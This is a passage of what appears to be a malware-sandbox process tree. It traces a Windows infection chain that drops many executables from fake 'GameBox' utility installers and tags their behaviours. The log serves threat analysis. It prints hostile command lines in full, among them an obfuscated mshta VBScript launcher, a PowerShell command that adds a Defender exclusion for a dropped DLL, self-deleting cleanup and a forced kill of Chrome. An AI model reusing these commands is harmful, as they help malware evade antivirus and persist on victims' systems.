                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Enumerates connected drives
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:4796
                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629380918 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                            6⤵
                                                                            • Enumerates connected drives
                                                                            PID:7064
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:212
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-QIN32.tmp\WEATHER Manager.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-QIN32.tmp\WEATHER Manager.tmp" /SL5="$9005C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:400
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-5QTFM.tmp\Setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-5QTFM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                              7⤵
                                                                              • Loads dropped DLL
                                                                              • Enumerates connected drives
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:6116
                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-5QTFM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-5QTFM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629380918 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                8⤵
                                                                                  PID:7860
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4708
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-BCNO5.tmp\MediaBurner2.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-BCNO5.tmp\MediaBurner2.tmp" /SL5="$10362,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5324
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-8EQ96.tmp\3377047_logo_media.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-8EQ96.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                7⤵
                                                                                • Drops file in Drivers directory
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Drops file in Program Files directory
                                                                                PID:5256
                                                                                • C:\Program Files\Windows Security\DMXSCVPSRA\ultramediaburner.exe
                                                                                  "C:\Program Files\Windows Security\DMXSCVPSRA\ultramediaburner.exe" /VERYSILENT
                                                                                  8⤵
                                                                                    PID:6712
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-BC8GM.tmp\ultramediaburner.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-BC8GM.tmp\ultramediaburner.tmp" /SL5="$205EE,281924,62464,C:\Program Files\Windows Security\DMXSCVPSRA\ultramediaburner.exe" /VERYSILENT
                                                                                      9⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:7188
                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                        10⤵
                                                                                          PID:7480
                                                                                    • C:\Users\Admin\AppData\Local\Temp\b1-960d8-2f0-4b69c-fa683e1cfe5b0\Rewozhyvade.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\b1-960d8-2f0-4b69c-fa683e1cfe5b0\Rewozhyvade.exe"
                                                                                      8⤵
                                                                                      • Checks computer location settings
                                                                                      PID:7208
                                                                                    • C:\Users\Admin\AppData\Local\Temp\f8-45269-7af-a3d9f-042d1e8dc846f\Pasapofaeco.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\f8-45269-7af-a3d9f-042d1e8dc846f\Pasapofaeco.exe"
                                                                                      8⤵
                                                                                        PID:7356
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i4ksfgsm.r4b\GcleanerEU.exe /eufive & exit
                                                                                          9⤵
                                                                                            PID:8044
                                                                                            • C:\Users\Admin\AppData\Local\Temp\i4ksfgsm.r4b\GcleanerEU.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\i4ksfgsm.r4b\GcleanerEU.exe /eufive
                                                                                              10⤵
                                                                                                PID:5484
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dcuadekv.y5v\installer.exe /qn CAMPAIGN="654" & exit
                                                                                              9⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:5804
                                                                                              • C:\Users\Admin\AppData\Local\Temp\dcuadekv.y5v\installer.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\dcuadekv.y5v\installer.exe /qn CAMPAIGN="654"
                                                                                                10⤵
                                                                                                • Loads dropped DLL
                                                                                                • Enumerates connected drives
                                                                                                • Modifies system certificate store
                                                                                                PID:7228
                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\dcuadekv.y5v\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\dcuadekv.y5v\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629380918 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                  11⤵
                                                                                                    PID:8632
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jemmstu.dln\ufgaa.exe & exit
                                                                                                9⤵
                                                                                                  PID:5564
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wiualms1.mrr\anyname.exe & exit
                                                                                                  9⤵
                                                                                                    PID:5156
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wiualms1.mrr\anyname.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\wiualms1.mrr\anyname.exe
                                                                                                      10⤵
                                                                                                        PID:4160
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\wiualms1.mrr\anyname.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\wiualms1.mrr\anyname.exe" -q
                                                                                                          11⤵
                                                                                                            PID:7736
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zyw5crpd.zop\gcleaner.exe /mixfive & exit
                                                                                                        9⤵
                                                                                                          PID:3868
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zyw5crpd.zop\gcleaner.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\zyw5crpd.zop\gcleaner.exe /mixfive
                                                                                                            10⤵
                                                                                                              PID:4116
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\15lbxnh3.ol3\autosubplayer.exe /S & exit
                                                                                                            9⤵
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:4004
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4580
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5984
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks computer location settings
                                                                                                    PID:5136
                                                                                                    • C:\Users\Admin\Documents\8gR3grLcdnZUP2Io7jwbpuxE.exe
                                                                                                      "C:\Users\Admin\Documents\8gR3grLcdnZUP2Io7jwbpuxE.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:5908
                                                                                                    • C:\Users\Admin\Documents\iuRTtmlEK5s6eZ66vVo9QBU8.exe
                                                                                                      "C:\Users\Admin\Documents\iuRTtmlEK5s6eZ66vVo9QBU8.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2220
                                                                                                    • C:\Users\Admin\Documents\Sa7pxaFNcqplPIZEWHVshODv.exe
                                                                                                      "C:\Users\Admin\Documents\Sa7pxaFNcqplPIZEWHVshODv.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5868
                                                                                                    • C:\Users\Admin\Documents\VfC_nlFfu8INz3vVr3og0hit.exe
                                                                                                      "C:\Users\Admin\Documents\VfC_nlFfu8INz3vVr3og0hit.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4892
                                                                                                      • C:\Users\Admin\Documents\VfC_nlFfu8INz3vVr3og0hit.exe
                                                                                                        C:\Users\Admin\Documents\VfC_nlFfu8INz3vVr3og0hit.exe
                                                                                                        7⤵
                                                                                                          PID:6340
                                                                                                      • C:\Users\Admin\Documents\flzOViTpFXJIZZLcBmkOoxze.exe
                                                                                                        "C:\Users\Admin\Documents\flzOViTpFXJIZZLcBmkOoxze.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5536
                                                                                                      • C:\Users\Admin\Documents\I57zCwzn2unlOnzIijJwTKCZ.exe
                                                                                                        "C:\Users\Admin\Documents\I57zCwzn2unlOnzIijJwTKCZ.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:5740
                                                                                                        • C:\Users\Admin\Documents\I57zCwzn2unlOnzIijJwTKCZ.exe
                                                                                                          "C:\Users\Admin\Documents\I57zCwzn2unlOnzIijJwTKCZ.exe"
                                                                                                          7⤵
                                                                                                            PID:6544
                                                                                                          • C:\Users\Admin\Documents\I57zCwzn2unlOnzIijJwTKCZ.exe
                                                                                                            "C:\Users\Admin\Documents\I57zCwzn2unlOnzIijJwTKCZ.exe"
                                                                                                            7⤵
                                                                                                              PID:4408
                                                                                                          • C:\Users\Admin\Documents\K7UuvlWXNAS0DRksqBNwxA4b.exe
                                                                                                            "C:\Users\Admin\Documents\K7UuvlWXNAS0DRksqBNwxA4b.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3032
                                                                                                          • C:\Users\Admin\Documents\WNWeYJJgXixlAEltMoyz5BQ8.exe
                                                                                                            "C:\Users\Admin\Documents\WNWeYJJgXixlAEltMoyz5BQ8.exe"
                                                                                                            6⤵
                                                                                                              PID:4268
                                                                                                            • C:\Users\Admin\Documents\qzzPMoJpwXpjjgQlf0_Hv0sK.exe
                                                                                                              "C:\Users\Admin\Documents\qzzPMoJpwXpjjgQlf0_Hv0sK.exe"
                                                                                                              6⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5396
                                                                                                              • C:\Users\Admin\Documents\qzzPMoJpwXpjjgQlf0_Hv0sK.exe
                                                                                                                "C:\Users\Admin\Documents\qzzPMoJpwXpjjgQlf0_Hv0sK.exe"
                                                                                                                7⤵
                                                                                                                  PID:6616
                                                                                                              • C:\Users\Admin\Documents\eTYh8XRDb2iWmYM4yU7A0JL5.exe
                                                                                                                "C:\Users\Admin\Documents\eTYh8XRDb2iWmYM4yU7A0JL5.exe"
                                                                                                                6⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:5480
                                                                                                                • C:\Users\Admin\Documents\eTYh8XRDb2iWmYM4yU7A0JL5.exe
                                                                                                                  C:\Users\Admin\Documents\eTYh8XRDb2iWmYM4yU7A0JL5.exe
                                                                                                                  7⤵
                                                                                                                    PID:6416
                                                                                                                • C:\Users\Admin\Documents\rQwbTJindJRHwS5L0WKaJ4IG.exe
                                                                                                                  "C:\Users\Admin\Documents\rQwbTJindJRHwS5L0WKaJ4IG.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5516
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\rQwbTJindJRHwS5L0WKaJ4IG.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\rQwbTJindJRHwS5L0WKaJ4IG.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                    7⤵
                                                                                                                      PID:4876
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\rQwbTJindJRHwS5L0WKaJ4IG.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\rQwbTJindJRHwS5L0WKaJ4IG.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                        8⤵
                                                                                                                          PID:6124
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill -f -iM "rQwbTJindJRHwS5L0WKaJ4IG.exe"
                                                                                                                            9⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:6756
                                                                                                                    • C:\Users\Admin\Documents\9uwv2oOth7pQG6NcQU6wGnK8.exe
                                                                                                                      "C:\Users\Admin\Documents\9uwv2oOth7pQG6NcQU6wGnK8.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5836
                                                                                                                    • C:\Users\Admin\Documents\1AxVqJfRVVIXTaeUhqdO6lbj.exe
                                                                                                                      "C:\Users\Admin\Documents\1AxVqJfRVVIXTaeUhqdO6lbj.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5568
                                                                                                                      • C:\Users\Admin\AppData\Roaming\5110155.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\5110155.exe"
                                                                                                                        7⤵
                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                        PID:2880
                                                                                                                      • C:\Users\Admin\AppData\Roaming\8399306.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\8399306.exe"
                                                                                                                        7⤵
                                                                                                                          PID:6748
                                                                                                                        • C:\Users\Admin\AppData\Roaming\4578082.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\4578082.exe"
                                                                                                                          7⤵
                                                                                                                            PID:6308
                                                                                                                          • C:\Users\Admin\AppData\Roaming\8652448.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\8652448.exe"
                                                                                                                            7⤵
                                                                                                                              PID:6316
                                                                                                                          • C:\Users\Admin\Documents\8GpNRnyk7V8MW_BGATXWqKTL.exe
                                                                                                                            "C:\Users\Admin\Documents\8GpNRnyk7V8MW_BGATXWqKTL.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4236
                                                                                                                          • C:\Users\Admin\Documents\1RU2qRg43woYlOxb31zHGrry.exe
                                                                                                                            "C:\Users\Admin\Documents\1RU2qRg43woYlOxb31zHGrry.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:4960
                                                                                                                          • C:\Users\Admin\Documents\sXHh8zcWWnyd_xdhX45gtJJn.exe
                                                                                                                            "C:\Users\Admin\Documents\sXHh8zcWWnyd_xdhX45gtJJn.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:3740
                                                                                                                          • C:\Users\Admin\Documents\v54KSWxfQVet3NaUXTcZHIxt.exe
                                                                                                                            "C:\Users\Admin\Documents\v54KSWxfQVet3NaUXTcZHIxt.exe"
                                                                                                                            6⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Checks processor information in registry
                                                                                                                            PID:5180
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im v54KSWxfQVet3NaUXTcZHIxt.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\v54KSWxfQVet3NaUXTcZHIxt.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              7⤵
                                                                                                                                PID:7764
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im v54KSWxfQVet3NaUXTcZHIxt.exe /f
                                                                                                                                  8⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:7876
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /t 6
                                                                                                                                  8⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:9048
                                                                                                                            • C:\Users\Admin\Documents\pNeW2HWlMpIu5Nb6bclqohCG.exe
                                                                                                                              "C:\Users\Admin\Documents\pNeW2HWlMpIu5Nb6bclqohCG.exe"
                                                                                                                              6⤵
                                                                                                                                PID:5936
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-LDJG6.tmp\pNeW2HWlMpIu5Nb6bclqohCG.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-LDJG6.tmp\pNeW2HWlMpIu5Nb6bclqohCG.tmp" /SL5="$20448,138429,56832,C:\Users\Admin\Documents\pNeW2HWlMpIu5Nb6bclqohCG.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:5816
                                                                                                                              • C:\Users\Admin\Documents\KqKXLFgrKRwAOBPEJ6O4Qtgd.exe
                                                                                                                                "C:\Users\Admin\Documents\KqKXLFgrKRwAOBPEJ6O4Qtgd.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:5848
                                                                                                                                  • C:\Users\Admin\Documents\KqKXLFgrKRwAOBPEJ6O4Qtgd.exe
                                                                                                                                    "C:\Users\Admin\Documents\KqKXLFgrKRwAOBPEJ6O4Qtgd.exe" -q
                                                                                                                                    7⤵
                                                                                                                                      PID:2656
                                                                                                                                  • C:\Users\Admin\Documents\Q4X8yp9wnBhbDEs80wZF6xk2.exe
                                                                                                                                    "C:\Users\Admin\Documents\Q4X8yp9wnBhbDEs80wZF6xk2.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:5976
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\Q4X8YP~1.DLL,s C:\Users\Admin\DOCUME~1\Q4X8YP~1.EXE
                                                                                                                                        7⤵
                                                                                                                                          PID:5804
                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\Q4X8YP~1.DLL,RCQgNWpYMjg=
                                                                                                                                            8⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Modifies system certificate store
                                                                                                                                            PID:5444
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\Q4X8YP~1.DLL
                                                                                                                                              9⤵
                                                                                                                                                PID:7992
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4728
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3748
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1151329.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1151329.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Modifies system certificate store
                                                                                                                                          PID:5376
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6699599.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6699599.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:5440
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4998342.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4998342.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:1240
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1926965.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1926965.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              PID:4768
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:432
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3520
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                6⤵
                                                                                                                                                  PID:6820
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                    7⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:3236
                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                5⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3832
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-ONEAU.tmp\VPN.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-ONEAU.tmp\VPN.tmp" /SL5="$202FC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:5160
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MT5RV.tmp\Setup.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MT5RV.tmp\Setup.exe" /silent /subid=720
                                                                                                                                          2⤵
                                                                                                                                            PID:1000
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-5NF15.tmp\Setup.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-5NF15.tmp\Setup.tmp" /SL5="$303AE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-MT5RV.tmp\Setup.exe" /silent /subid=720
                                                                                                                                              3⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:6228
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                4⤵
                                                                                                                                                  PID:4232
                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                                                    5⤵
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    PID:2988
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5192
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                      5⤵
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      PID:6708
                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:1724
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      5⤵
                                                                                                                                                        PID:8116
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:4780
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                1⤵
                                                                                                                                                  PID:6012
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:5972
                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                  1⤵
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  PID:6360
                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding D9E58F1F2FAE3206EB9BE3C7BE923AE4 C
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:1796
                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding D171004A8D87902E749BF23434484200
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:6484
                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
